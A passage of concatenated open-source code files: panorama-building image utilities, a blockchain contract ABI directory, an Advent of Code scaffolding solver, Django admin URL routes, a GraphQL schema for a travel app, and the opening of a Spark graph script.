im_shape[0]))\n\n    for frame in frames:\n        out.write(frame)\n\n    out.release()\n\n\ndef reverse_video(dir):\n    \"\"\"\n    Creates a new folder named '<sequence>-reversed' and saves in it all the images in the sequence, in reversed order.\n    \"\"\"\n    sequence = dir.split('/')[-1]\n    os.system(f'mkdir ../Data/{sequence}-reversed')\n    images_path = sorted_alphanumeric(os.listdir(dir))\n    i = len(images_path)\n    for im_path in images_path:\n        if im_path == '.DS_Store':\n            continue\n        im = BGR2RGB(cv2.imread(dir + '/' + im_path))\n        plt.imsave(f'../Data/{sequence}-reversed/reversed-{i}.jpg', im)\n        i -= 1\n\n\ndef create_panorama_small_start(start_frame, end_frame, start_column, end_column, frames, homographies):\n    \"\"\"\n    Creates a new panorama image in the case where the starting column is smaller than the ending column\n    :param start_frame: the first frame to use for the panorama\n    :param end_frame: the last frame to use for the panorama\n    :param start_column: the first column to use in the panorama\n    :param end_column: the last column to use in the panorama\n    :param frames: the loaded frames that should be used for creating the panorama\n    :param homographies: the homographies between every consecutive frames in the sequence\n    :return: the new panorama image\n    \"\"\"\n    im_shape = frames[0].shape\n    if start_frame == end_frame:\n        return frames[start_frame][:, start_column:end_column, :]\n    col_range = end_column - start_column\n    total_motion = int(np.sum(np.round(homographies[0, 2, start_frame:end_frame])))\n    first_motion = int(round(homographies[0, 2, start_frame]))\n    num_frames = end_frame - start_frame + 1\n    start_pos = calculate_added_motion(start_column + first_motion, end_column, num_frames)\n    panorama_width = total_motion + col_range\n    panorama_im = np.zeros((im_shape[0], panorama_width, im_shape[2])).astype(np.uint8)\n    panorama_col = 0\n\n    if start_column == end_column:\n        for i in range(num_frames - 1):\n            print(i)\n            motion = int(round(homographies[0, 2, start_frame + i]))\n            if start_column + motion < im_shape[1]:\n                panorama_im[:, panorama_col: panorama_col + motion, :] = \\\n                    frames[start_frame + i][:, start_column: start_column + motion, :]\n            else:\n                print('in else')\n                panorama_im[:, panorama_col: panorama_col + motion, :] = \\\n                    frames[start_frame + i][:, im_shape[1] - motion:, :]\n            panorama_col += motion\n        return 
panorama_im\n\n if end_column - start_column < first_motion and end_column != start_column:\n panorama_im[:, : end_column - start_column, :] = frames[start_frame][:, start_column: end_column, :]\n panorama_col += end_column - start_column\n panorama_im[:, panorama_col:, :] = create_panorama_small_start(start_frame, end_frame, start_column,\n start_column, frames, homographies)\n return panorama_im\n\n panorama_im[:, : start_pos[1] - start_pos[0] + first_motion, :] = \\\n frames[start_frame][:, start_pos[0] - first_motion: start_pos[1], :]\n panorama_col += start_pos[1] - start_pos[0] + first_motion\n\n for i in range(1, num_frames):\n # print(i)\n motion = int(round(homographies[0, 2, start_frame + i - 1]))\n if start_pos[i + 1] + motion <= im_shape[1]:\n panorama_im[:, panorama_col: panorama_col + start_pos[i + 1] - start_pos[i] + motion, :] = \\\n frames[start_frame + i][:, start_pos[i]: start_pos[i + 1] + motion, :]\n else:\n panorama_im[:, panorama_col: panorama_col + start_pos[i + 1] - start_pos[i] + motion, :] = \\\n frames[start_frame + i][:, start_pos[i] - motion: start_pos[i + 1], :]\n panorama_col += start_pos[i + 1] - start_pos[i] + motion\n return panorama_im\n\n\ndef create_panorama_big_start(start_frame, end_frame, start_column, end_column, frames, homographies):\n \"\"\"\n Creates a new panorama image in the case where the starting column is bigger than the ending column\n :param start_frame: the first frame to use for the panorama\n :param end_frame: the last frame to use for the panorama\n :param start_column: the first column to use in the panorama\n :param end_column: the last column to use in the panorama\n :param frames: the loaded frames that should be used for creating the panorama\n :param homographies: the homographies between every consecutive frames in the sequence\n :return: the new panorama image\n \"\"\"\n im_shape = frames[0].shape\n if start_frame == end_frame:\n return frames[start_frame][:, end_column: start_column + 1, :]\n total_motion = int(np.sum(np.round(homographies[0, 2, start_frame:end_frame])))\n num_frames = end_frame - start_frame + 1\n num_cols = start_column - end_column + 1\n first_motion = int(round(homographies[0, 2, start_frame]))\n cur_start = start_column - first_motion\n panorama_width = total_motion\n if panorama_width <= 0:\n raise Exception('illegal panorama')\n panorama_im = np.zeros((im_shape[0], panorama_width, im_shape[2])).astype(np.uint8)\n panorama_col = 0\n for i in range(end_frame - start_frame - 1):\n added_motion = (num_cols - first_motion) // (num_frames - 2)\n next_motion = int(round(homographies[0, 2, start_frame + i + 1]))\n if i < ((num_cols - first_motion) % (num_frames - 2)):\n added_motion += 1\n cur_end = cur_start + next_motion - added_motion\n if cur_end < cur_start:\n cur_start, cur_end = cur_end, cur_start\n slit_width = cur_end - cur_start\n if cur_end > start_column:\n cur_end = start_column\n cur_start = cur_end - slit_width\n if cur_start < end_column:\n cur_start = end_column\n cur_end = cur_start + slit_width\n panorama_im[:, panorama_col: panorama_col + slit_width, :] = frames[start_frame + i][:, cur_start:cur_end, :]\n panorama_col += slit_width\n cur_start -= added_motion\n panorama_im = np.delete(panorama_im, np.where((panorama_im == 0).all(0)), axis=1)\n return panorama_im\n\n\ndef create_panorama(start_frame, end_frame, start_column, end_column, frames, homographies):\n \"\"\"\n Creates a new panorama image defined by the given end points\n :param start_frame: the first frame to use for the 
panorama\n :param end_frame: the last frame to use for the panorama\n :param start_column: the first column to use in the panorama\n :param end_column: the last column to use in the panorama\n :param frames: the loaded frames that should be used for creating the panorama\n :param homographies: the homographies between every consecutive frames in the sequence\n :return: the new panorama image\n \"\"\"\n if start_column <= end_column:\n panorama_im = create_panorama_small_start(start_frame, end_frame, start_column, end_column, frames,\n homographies)\n else:\n panorama_im = create_panorama_big_start(start_frame, end_frame, start_column, end_column, frames, homographies)\n return panorama_im\n\n\ndef produce_panorama_sequence(dir, start_frame, end_frame, start_column, end_column, fix_param=None):\n \"\"\"\n Produces and saves a sequence of panoramas defined by the given parameters.\n :param dir: the directory of the frames that should be used for the panorama\n :param start_frame: the first frame to use for the panorama\n :param end_frame: the last frame to use for the panorama\n :param start_column: the first column to use in the panorama\n :param end_column: the last column to use in the panorama\n :param fix_param: defines which parameter should be fixed - columns or frames. If the given value is 'frames' then\n the produced panoramas will be all possible panoramas with the given frames and columns ranging from the given start\n column to the given end column. If the given value is 'cols' then the produced panoramas will be all possible\n panoramas with the fixed columns and frames ranging from the given start and end frames. If not specified the\n function will create a single panorama image from the defined end points.\n \"\"\"\n sequence = dir.split('/')[-1]\n os.system(f'mkdir ../Results/{sequence}')\n\n # load the frames:\n frames = load_images(dir)\n file_name = dir.split('/')[-1]\n num_frames = len(frames)\n\n # compute all homographies:\n try:\n homographies = np.genfromtxt('../Motion/' + file_name + '.csv', delimiter=',').reshape((3, 3, num_frames - 1))\n except IOError:\n homographies = compute_homographies(frames, translation_only=True)\n csv_data = homographies.reshape((9, num_frames - 1))\n np.savetxt('../Motion/' + sequence + '.csv', csv_data, delimiter=',')\n\n frames = validate_motion_direction(frames)\n\n if fix_param == 'frames':\n min_col = min(start_column, end_column)\n max_col = max(start_column, end_column)\n for j in range(min_col, max_col // 2):\n panorama_im = create_panorama(start_frame, end_frame, j, end_column - j, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{start_frame}-{end_frame}_cols{j}-{end_column - j}.jpg',\n BGR2RGB(panorama_im))\n\n elif fix_param == 'cols':\n num_frames = end_frame - start_frame + 1\n for j in range(num_frames // 2):\n panorama_im = create_panorama(start_frame + j, end_frame - j, start_column, end_column, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{start_frame+j}-{end_frame-j}_cols{start_column}-{end_column}.jpg',\n BGR2RGB(panorama_im))\n\n else:\n panorama_im = create_panorama(start_frame, end_frame, start_column, end_column, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{start_frame}-{end_frame}_cols{start_column}-{end_column}.jpg',\n BGR2RGB(panorama_im))\n\n\ndef validate_motion_direction(frames):\n \"\"\"\n Validates that the given sequence is taken from left to right. 
If the sequence was taken from right to left,\n this function reverses the frames.\n \"\"\"\n test_num = max(int(len(frames) // 10), 1)\n test_homographies = np.zeros((3, 3, test_num))\n for i in range(test_num):\n test_homographies[:, :, i] = Homography(frames[i], frames[i + 1], translation_only=True)\n if np.sum(test_homographies[0, 2, :]) < 0:\n frames = frames[::-1]\n return frames\n\n\ndef create_left_right_panoramas(dir):\n \"\"\"\n Creates all possible panoramas with the same starting and ending columns. This creates a left to right view.\n \"\"\"\n sequence = dir.split('/')[-1]\n os.system(f'mkdir ../Results/{sequence}')\n\n # load the frames:\n frames = load_images(dir)\n file_name = dir.split('/')[-1]\n num_frames = len(frames)\n\n # compute all homographies:\n try:\n homographies = np.genfromtxt('../Motion/' + file_name + '.csv', delimiter=',').reshape((3, 3, num_frames - 1))\n except IOError:\n homographies = compute_homographies(frames, translation_only=True)\n csv_data = homographies.reshape((9, num_frames - 1))\n np.savetxt('../Motion/' + sequence + '.csv', csv_data, delimiter=',')\n\n frames = validate_motion_direction(frames)\n im_shape = frames[0].shape\n for i in range(im_shape[1]):\n panorama_im = create_panorama(0, num_frames-1, i, i, frames, homographies)\n plt.imsave(f'../Results/{sequence}/panorama_frames{0}-{num_frames-1}_cols{i}-{i}.jpg',\n BGR2RGB(panorama_im))\n\n\n# create_left_right_panoramas('../Data/train-in-snow')\n# produce_panorama_sequence('../Data/apples', 0, 212, 0, 0)\n# frames2video('../Data/train-in-snow-reversed')\n# reverse_video('../Data/Banana')\n# video2frames('Nutella')\n","repo_name":"darkushin/Light-Fields","sub_path":"Code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40148767368","text":"import json\nfrom dataclasses import dataclass\nfrom dataclasses import field\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Optional\n\nimport requests\nfrom clamfig import deserialize\nfrom clamfig import Serializable\n\nfrom telliot_core.apps.config import ConfigOptions\nfrom telliot_core.utils.home import TELLIOT_CORE_ROOT\n\n\n# Read contract ABIs from json files\n_abi_folder = Path(__file__).resolve().parent / \"data\" / \"abi\"\n\n\n@dataclass\nclass ContractInfo(Serializable):\n name: str\n org: str\n address: dict[int, str]\n abi_file: Optional[str] = None\n\n _abi: Optional[list[Any]] = field(default=None, init=False, repr=False)\n\n def get_abi(self, chain_id: int = 0, api_key: str = \"\") -> list[Any]:\n \"\"\"Returns the contract ABI.\n\n The ABI is lazily loaded from a file the first time it is requested\n and stored for later access. 
If an abi file is not defined, an attempt\n is made to retrieve the ABI from the chain explorer.\n \"\"\"\n if not chain_id:\n chain_id = list(self.address.keys())[0]\n\n if not self._abi:\n if self.abi_file:\n with open(_abi_folder / self.abi_file, \"r\") as f:\n self._abi = json.load(f)\n else:\n # try to get from etherscan or other explorer using example:\n address = self.address[chain_id]\n if chain_id == 1:\n url = \"https://api.etherscan.io\"\n elif chain_id == 3:\n url = \"https://api-ropsten.etherscan.io\"\n elif chain_id == 4:\n url = \"https://api-rinkeby.etherscan.io\"\n elif chain_id == 5:\n url = \"https://api-goerli.etherscan.io\"\n elif chain_id == 42:\n url = \"https://api-kovan.etherscan.io\"\n elif chain_id == 137:\n url = \"https://api.polygonscan.com\"\n elif chain_id == 420:\n url = \"https://goerli-optimism.etherscan.io/\"\n elif chain_id == 80001:\n url = \"https://api-testnet.polygonscan.com\"\n elif chain_id == 42161:\n url = \"https://api.arbiscan.io/\"\n elif chain_id == 421613:\n url = \"https://goerli.arbiscan.io/\"\n elif chain_id == 10200:\n url = \"https://blockscout.chiadochain.net/\"\n elif chain_id == 100:\n url = \"https://api.gnosisscan.io\"\n elif chain_id == 10:\n url = \"https://optimistic.etherscan.io/\"\n elif chain_id == 3141:\n url = \"https://hyperspace.filfox.info/en\"\n elif chain_id == 314159:\n url = \"https://calibration.filfox.info/en\"\n elif chain_id == 314:\n url = \"https://filfox.info/en\"\n elif chain_id == 11155111:\n url = \"https://api-sepolia.etherscan.io\"\n elif chain_id == 3441005:\n url = \"https://manta-testnet.calderaexplorer.xyz\"\n elif chain_id == 84531:\n url = \"https://api-goerli.basescan.org/\"\n else:\n raise ValueError(f\"Could not retrieve ABI using chain_id {chain_id}\")\n\n url = url + f\"/api?module=contract&action=getabi&address={address}&format=raw\"\n\n if api_key:\n url = url + f\"&apikey={api_key}\"\n\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0\"}\n response = requests.get(url, headers=headers)\n self._abi = response.json()\n\n return self._abi # type: ignore\n\n def restore_state(self, state: dict[Any, Any]) -> None:\n \"\"\"Workaround JSON dict key type issue. 
This should be handled by clamfig in the future.\"\"\"\n strkeys = list(state[\"address\"].keys())\n for chain_id in strkeys:\n state[\"address\"][int(chain_id)] = state[\"address\"].pop(chain_id)\n\n super().restore_state(state)\n\n\n@dataclass\nclass ContractDirectory(ConfigOptions):\n \"\"\"Contract directory object\"\"\"\n\n entries: dict[str, ContractInfo] = field(default_factory=dict)\n\n def add_entry(self, entry: ContractInfo) -> None:\n \"\"\"Add ContractInfo object to directory.\"\"\"\n\n if entry.name in self.entries:\n raise ValueError(f\"Contract {entry.name} already in directory\")\n\n self.entries[entry.name] = entry\n\n @classmethod\n def from_file(cls, filepath: Path) -> \"ContractDirectory\":\n \"\"\"Create a ContractDirectory from file.\"\"\"\n\n with open(filepath) as f:\n state = json.load(f)\n\n entry_list = deserialize(state)\n\n obj = cls(entries={})\n\n for entry in entry_list:\n obj.add_entry(entry)\n\n return obj\n\n def find(\n self,\n *,\n org: Optional[str] = None,\n name: Optional[str] = None,\n address: Optional[str] = None,\n chain_id: Optional[int] = None,\n ) -> list[ContractInfo]:\n \"\"\"Search the Contract Directory.\"\"\"\n\n result = []\n for info in self.entries.values():\n if org is not None:\n if org != info.org:\n continue\n if chain_id is not None:\n if chain_id not in info.address.keys():\n continue\n if name is not None:\n if name not in info.name:\n continue\n if address is not None:\n if address not in info.address.values():\n continue\n\n result.append(info)\n\n return result\n\n\ncontract_directory = ContractDirectory.from_file(TELLIOT_CORE_ROOT / \"data/contract_directory.json\")\n","repo_name":"tellor-io/telliot-core","sub_path":"src/telliot_core/directory.py","file_name":"directory.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"2539492626","text":"import sys\n\nfrom IntcodeComputer import IntcodeComputer\n\n# =================================================\n\nclass Scaffolding:\n\n def __init__(self, computer_outputs):\n\n # Parse computer output into grid\n self.grid = []\n row = []\n for c in computer_outputs:\n if c == 10 and len(row) > 0:\n self.grid.append(row)\n row = []\n else:\n row.append(chr(c))\n self.nrows = len(self.grid)\n self.ncols = len(self.grid[0])\n\n # Initial robot position and direction\n for i in range(self.nrows):\n for j in range(self.ncols):\n if self.grid[i][j] in ['<', '>', 'v', '^']:\n self.x, self.y = i, j\n self.direc = self.grid[i][j]\n self.grid[i][j] = \"#\"\n break\n\n def get_dxdy(self, direc):\n # Note: x is the row, so the vertical coord,\n # while y is the column, so horizontal coord\n if direc == '^':\n dx = -1; dy = 0\n elif direc == '>':\n dx = 0; dy = +1\n elif direc == 'v':\n dx = +1; dy = 0\n elif direc == '<':\n dx = 0; dy = -1\n return dx, dy\n\n def get_new_direc(self, cur_direc, turn):\n direcs = ['^', '>', 'v', '<']\n idx = direcs.index(cur_direc)\n if turn == \"L\":\n idx -= 1\n elif turn == \"R\":\n idx += 1\n return direcs[idx % 4]\n\n def grid_at(self, x, y):\n if x < 0 or x > self.nrows-1 or y < 0 or y > self.ncols-1:\n return None\n else:\n return self.grid[x][y]\n\n def walk_robot(self, debug=False):\n route = []\n fwd = 0\n while True:\n if debug:\n self.draw()\n if debug:\n print(\"pos={},{} direc={}\".format(self.x, self.y, self.direc))\n dx, dy = self.get_dxdy(self.direc)\n if self.grid_at(self.x+dx, self.y+dy) == \"#\":\n fwd += 1\n self.x += dx; self.y += dy\n if 
debug:\n print(\"Moved forward\")\n print(\"Fwd:\", fwd)\n else:\n if debug:\n print(\"Can't move forward, trying turn\")\n found = False\n for turn in [\"L\", \"R\"]:\n new_direc = self.get_new_direc(self.direc, turn)\n new_dx, new_dy = self.get_dxdy(new_direc)\n if self.grid_at(self.x+new_dx, self.y+new_dy) == \"#\":\n found = True\n if fwd > 0:\n route.append(fwd)\n if debug:\n print(\"Turned\", turn)\n route.append(turn)\n self.direc = new_direc\n fwd = 0\n break\n if not found:\n if fwd > 0:\n route.append(fwd)\n if debug:\n print(\"Reached end\")\n break\n if debug:\n input(\"ENTER TO CONTINUE\")\n\n return route\n\n def draw(self):\n for i in range(self.nrows):\n _row = self.grid[i][:]\n if i == self.x:\n _row[self.y] = self.direc\n print(\"\".join(_row))\n\n# =================================================\n\nwith open(sys.argv[1]) as f:\n program = [int(x) for x in f.readline().split(\",\")]\n\ncomputer = IntcodeComputer(program)\ncomputer.execute(quiet=True)\nscaff = Scaffolding(computer.outputs)\n\n# Part 1\n\n# Find intersections\ngrid = scaff.grid\ninters = []\nfor i in range(1,scaff.nrows-1):\n for j in range(1,scaff.ncols-1):\n if grid[i][j] == \"#\" and grid[i-1][j] == \"#\" and grid[i+1][j] == \"#\" and grid[i][j-1] == \"#\" and grid[i][j+1] == \"#\":\n inters.append((i,j))\n\nresult = sum([p[0]*p[1] for p in inters])\nprint(\"Part 1:\", result)\n\n# Part 2\n\n# First automatically find route along scaffolding\nroute = scaff.walk_robot()\nroute_str = \",\".join([str(x) for x in route])\nprint(route_str)\n\n# Then manually group instructions, and define them here:\ndefinitions = {\n\"A\": \"L,12,L,8,R,12\",\n\"B\": \"L,10,L,8,L,12,R,12\",\n\"C\": \"R,12,L,8,L,10\"\n}\n\ncomp_route = route_str\nfor func in [\"A\", \"B\", \"C\"]:\n comp_route = comp_route.replace(definitions[func], func)\n\n# Check the compressed route is good\nprint(f\"Compressed: {comp_route} ({len(comp_route)})\", )\nfor func in [\"A\", \"B\", \"C\"]:\n print(f\"Function {func}: {definitions[func]} ({len(definitions[func])})\")\n\n# Now feed the program the definitions (ASCII-translated) and execute it\nprogram[0] = 2\ncomputer = IntcodeComputer(program)\nseq = [ord(x) for x in comp_route] + [10]\nprint(seq)\nfor item in seq:\n computer.inputs.put(item)\nfor func in [\"A\", \"B\", \"C\"]:\n seq = [ord(x) for x in definitions[func]] + [10]\n print(seq)\n for item in seq:\n computer.inputs.put(item)\ncomputer.inputs.put(ord(\"n\"))\ncomputer.inputs.put(10)\ncomputer.execute(quiet=True)\n\n# The last output is the answer\nprint(\"Part 2:\", computer.last_output)\n","repo_name":"meithan/AoC19","sub_path":"day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26532858928","text":"from day3.direction import *\nimport numpy\n\n\nclass SpiralIterator:\n def __init__(self, coords):\n self.coords = coords\n self.sidelen = 1\n self.side_left = 1\n self.direction = r\n\n def turn(self):\n next_dir = self.direction.next\n next_length = self.sidelen\n if next_dir == r or next_dir == l:\n next_length += 1\n self.direction = next_dir\n self.sidelen = next_length\n self.side_left = next_length\n\n def next(self):\n coords = self.coords\n if self.side_left == 0:\n self.turn()\n self.coords += self.direction.vector\n self.side_left -= 1\n return coords\n\n\ndef read_int():\n return int(input())\n\n\ndef next_(current_number, iterator):\n return current_number + 1, iterator.next()\n\n\ndef 
sum_neighbors(matrix, x, y):\n neighbors = matrix[y - 1][x - 1: x + 2] + matrix[y][x - 1: x + 2] + \\\n matrix[y + 1][x - 1: x + 2]\n print(\"neighbors of %d, %d are %s\" % (x, y, neighbors))\n return sum(\n neighbors\n )\n\n\ndef next__(matrix, x, y):\n next_val = sum_neighbors(matrix, x, y)\n matrix[y][x] = next_val\n return next_val\n\ndestination_number = read_int()\n\nnumber, iterator = 1, SpiralIterator(Vector(6, 6))\niterator.next()\n\n# for i in range(0, destination_number):\n# number, coords = next_(number, iterator)\n#\n# print(\"Distance is %d\" % coords.manhattan_distance())\n\nmatrix = numpy.zeros((13, 13), numpy.dtype('i'))\nmatrix[6, 6] = 1\nwhile number <= destination_number:\n print(matrix)\n coords = iterator.next()\n print(coords)\n number = next__(matrix, coords.x, coords.y)\n\nprint(matrix)\nprint(number)","repo_name":"howsad/aoc2017","sub_path":"src/day3/day3_1.py","file_name":"day3_1.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24025329699","text":"from django.urls import path\nfrom adminapp import views as admin_views\n\napp_name = 'adminapp'\n\nurlpatterns = [\n path('users/create/', admin_views.ShopUserCreateView.as_view(), name='user_create'),\n path('', admin_views.ShopUserListView.as_view(), name='user_list'),\n path('users/update//', admin_views.ShopUserUpdateView.as_view(), name='user_update'),\n path('users/delete//', admin_views.ShopUserDeleteView.as_view(), name='user_delete'),\n\n path('categories/create/', admin_views.ProductCategoryCreateView.as_view(), name='category_create'),\n path('categories/', admin_views.ProductCategoryListView.as_view(), name='category_list'),\n path('categories/update//', admin_views.ProductCategoryUpdateView.as_view(), name='category_update'),\n path('categories/delete//', admin_views.ProductCategoryDeleteView.as_view(), name='category_delete'),\n\n path('products/create//', admin_views.ProductCreateView.as_view(), name='product_create'),\n path('products//', admin_views.ProductListView.as_view(), name='product_list'),\n path('products/update//', admin_views.ProductUpdateView.as_view(), name='product_update'),\n path('products/delete//', admin_views.ProductDeleteView.as_view(), name='product_delete'),\n path('products/detail//', admin_views.ProductDetailView.as_view(), name='product_detail'),\n\n]","repo_name":"AlekseyB86/GB_DJANGO_geekshop","sub_path":"adminapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70143866667","text":"import graphene\nfrom graphene_django import DjangoObjectType\nfrom .models import *\n\n# setting query\n\n\nclass ClientType(DjangoObjectType):\n class Meta:\n model = Client\n fields = '__all__'\n\n\nclass TripType(DjangoObjectType):\n class Meta:\n model = Trip\n fields = '__all__'\n\n\nclass HotelType(DjangoObjectType):\n class Meta:\n model = Hotel\n fields = '__all__'\n\n\nclass Query(graphene.ObjectType):\n client = graphene.Field(ClientType, id=graphene.ID(required=True))\n clients = graphene.List(ClientType)\n\n trip = graphene.Field(TripType, id=graphene.ID(required=True))\n trips = graphene.List(TripType)\n\n hotel = graphene.Field(HotelType, id=graphene.ID(required=True))\n hotels = graphene.List(HotelType)\n\n def resolve_client(root, info, id):\n return Client.objects.get(pk=id)\n\n def resolve_clients(root, info, **kwargs):\n return 
Client.objects.all()\n\n def resolve_trip(root, info, id):\n return Trip.objects.get(pk=id)\n\n def resolve_trips(root, info, **kwargs):\n return Trip.objects.all()\n\n def resolve_hotel(root, info, id):\n return Hotel.objects.get(pk=id)\n\n def resolve_hotels(root, info, **kwargs):\n return Hotel.objects.all()\n\n# setting mutations\n\n\nclass CreateClient(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n surname = graphene.String(required=True)\n pesel = graphene.String(required=True)\n phoneNumber = graphene.String(required=True)\n\n client = graphene.Field(ClientType)\n\n @classmethod\n def mutate(cls, root, info, name, surname, pesel, phoneNumber):\n client = Client()\n client.name = name\n client.surname = surname\n client.pesel = pesel\n client.phoneNumber = phoneNumber\n client.save()\n return CreateClient(client=client)\n\n\nclass UpdateClient(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n name = graphene.String(required=False)\n surname = graphene.String(required=False)\n pesel = graphene.String(required=False)\n phoneNumber = graphene.String(required=False)\n\n client = graphene.Field(ClientType)\n\n @classmethod\n def mutate(cls, root, info, id, name=None, surname=None, pesel=None, phoneNumber=None):\n client = Client.objects.filter(pk=id)\n if client is None:\n raise Exception('Client does not exist.')\n client = Client.objects.get(pk=id)\n if name:\n client.name = name\n if surname:\n client.surname = surname\n if pesel:\n client.pesel = pesel\n if phoneNumber:\n client.phoneNumber = phoneNumber\n client.save()\n return UpdateClient(client=client)\n\n\nclass DeleteClient(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n\n success = graphene.Boolean()\n\n @classmethod\n def mutate(cls, root, info, id):\n try:\n client = Client.objects.get(pk=id)\n client.delete()\n success = True\n except Client.DoesNotExist:\n success = False\n\n return DeleteClient(success=success)\n\n\nclass CreateHotel(graphene.Mutation):\n class Arguments:\n name = graphene.String(required=True)\n phoneNumber = graphene.String(required=True)\n website = graphene.String(required=True)\n stars = graphene.String(required=False, default_value=\"1\")\n\n hotel = graphene.Field(HotelType)\n\n @classmethod\n def mutate(cls, root, info, name, phoneNumber, website, stars):\n hotel = Hotel()\n hotel.name = name\n hotel.phoneNumber = phoneNumber\n hotel.website = website\n hotel.stars = stars\n hotel.save()\n\n return CreateHotel(hotel=hotel)\n\n\nclass UpdateHotel(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n name = graphene.String(required=False)\n phoneNumber = graphene.String(required=False)\n website = graphene.String(required=False)\n stars = graphene.String(required=False)\n\n hotel = graphene.Field(HotelType)\n\n @classmethod\n def mutate(cls, root, info, id, name=None, phoneNumber=None, website=None, stars=None):\n hotel = Hotel.objects.filter(pk=id)\n if hotel is None:\n raise Exception('Hotel does not exist.')\n hotel = Hotel.objects.get(pk=id)\n if name:\n hotel.name = name\n if phoneNumber:\n hotel.phoneNumber = phoneNumber\n if website:\n hotel.website = website\n if stars:\n hotel.stars = stars\n hotel.save()\n return UpdateHotel(hotel=hotel)\n\n\nclass DeleteHotel(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n\n success = graphene.Boolean()\n\n @classmethod\n def mutate(cls, root, info, id):\n try:\n hotel = Hotel.objects.get(pk=id)\n hotel.delete()\n success = True\n except hotel.DoesNotExist:\n 
success = False\n\n return DeleteHotel(success=success)\n\n\nclass CreateTrip(graphene.Mutation):\n class Arguments:\n client = graphene.List(graphene.ID)\n hotel = graphene.ID()\n country = graphene.String()\n city = graphene.String()\n price = graphene.Decimal()\n checkinDate = graphene.DateTime()\n checkoutDate = graphene.DateTime()\n\n trip = graphene.Field(TripType)\n\n @classmethod\n def mutate(cls, root, info, client, hotel, country, city, price, checkinDate, checkoutDate):\n clients = Client.objects.filter(pk__in=client)\n hotel = Hotel.objects.get(pk=hotel)\n trip = Trip.objects.create(hotel=hotel, country=country, city=city,\n price=price, checkinDate=checkinDate, checkoutDate=checkoutDate)\n trip.client.set(clients)\n trip.save()\n\n return CreateTrip(trip=trip)\n\n\nclass UpdateTrip(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n clients = graphene.List(graphene.ID, required=False)\n hotel = graphene.ID(required=False)\n country = graphene.String(required=False)\n city = graphene.String(required=False)\n price = graphene.Decimal(required=False)\n checkinDate = graphene.DateTime(required=False)\n checkoutDate = graphene.DateTime(required=False)\n\n trip = graphene.Field(TripType)\n\n @classmethod\n def mutate(cls, root, info, id, client=None, hotel=None, country=None, city=None, price=None, checkinDate=None, checkoutDate=None):\n trip = Trip.objects.filter(pk=id)\n if trip is None:\n raise Exception('Trip does not exist.')\n trip = Trip.objects.get(pk=id)\n if client:\n clients = Client.objects.filter(pk__in=client)\n trip.client.set(clients)\n if hotel:\n hotel = Hotel.objects.get(pk=hotel)\n trip.hotel = hotel\n if country:\n trip.country = country\n if city:\n trip.city = city\n if price:\n trip.price = price\n if checkinDate:\n trip.checkinDate = checkinDate\n if checkoutDate:\n trip.checkoutDate = checkoutDate\n trip.save()\n return UpdateTrip(trip=trip)\n\n\nclass DeleteTrip(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n\n success = graphene.Boolean()\n\n @classmethod\n def mutate(cls, root, info, id):\n try:\n trip = Trip.objects.get(pk=id)\n trip.delete()\n success = True\n except trip.DoesNotExist:\n success = False\n\n return DeleteTrip(success=success)\n\n\nclass Mutation(graphene.ObjectType):\n create_client = CreateClient.Field()\n update_client = UpdateClient.Field()\n delete_client = DeleteClient.Field()\n\n create_hotel = CreateHotel.Field()\n update_hotel = UpdateHotel.Field()\n delete_hotel = DeleteHotel.Field()\n\n create_trip = CreateTrip.Field()\n update_trip = UpdateTrip.Field()\n delete_trip = DeleteTrip.Field()\n\n\n# creating schema constructor\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"MadPapa/graphQL-Trips","sub_path":"trips/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":8153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29033490995","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport argparse\nimport gzip, os, csv\nimport numpy as np\nimport random\nimport time\nimport networkx as nx\nimport gensim\nimport shutil\n\nimport findspark\nfindspark.init(\"/usr/local/spark\")\n\nfrom pyspark import SparkConf, SparkContext\n\n\n\ndef addTriple(net, source, target, edge):\n if source in net:\n if target in net[source]:\n net[source][target].add(edge)\n else:\n net[source][target]= set([edge])\n else:\n net[source]={}\n net[source][target] =set([edge])\n \ndef getLinks(net, source):\n if source not in net:\n 
